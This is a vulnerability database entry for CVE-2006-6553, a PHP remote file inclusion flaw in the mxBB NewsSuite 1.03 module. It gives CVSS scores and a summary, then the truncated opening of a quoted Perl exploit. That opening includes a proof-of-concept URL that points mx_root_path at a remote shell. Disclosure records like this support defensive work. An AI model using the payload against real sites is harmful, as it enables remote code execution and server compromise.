7.5
CVSSv2

CVE-2006-6553

Published: 14/12/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in includes/newssuite_constants.php in the NewsSuite 1.03 module for mxBB allows remote malicious users to execute arbitrary PHP code via a URL in the mx_root_path parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

mxbb mxbb newssuite 1.03

Exploits

#!/usr/bin/perl #mxBB newssuite Module v15 --Remote File Inclusion Exploit #Bug Found & Exploit [c]oded By Dr Max Virus #Download:wwwmx-systemcom/modules/mx_pafiledb/dloadphp?action=download&file_id=17 #PoC: [target]/mxBB/modules/mx_newssuite/includes/newssuite_constantsphp?mx_root_path=[shell] use LWP::UserAgent; $t ...